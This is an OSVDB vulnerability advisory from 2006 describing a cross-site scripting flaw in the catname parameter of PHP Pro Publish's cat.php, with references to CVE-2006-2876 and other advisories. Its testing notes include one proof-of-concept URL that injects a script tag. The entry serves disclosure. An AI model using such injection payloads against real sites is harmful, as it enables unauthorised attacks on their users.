PHP Pro Publish cat.php catname Variable XSS

2006-06-02T08:20:22
ID OSVDB:25979
Type osvdb
Reporter OSVDB
Modified 2006-06-02T08:20:22

Description

Manual Testing Notes

http://[target]/propublish/cat.php?catname="><script>alert(/Soot/)</script>

References:

Vendor URL: http://www.deltascripts.com/ Secunia Advisory ID:20444 Related OSVDB ID: 25978 Other Advisory URL: http://soot.shabgard.org/bugs/propublish.txt Mail List Post: http://seclists.org/lists/bugtraq/2006/Jun/0037.html FrSIRT Advisory: ADV-2006-2130 CVE-2006-2876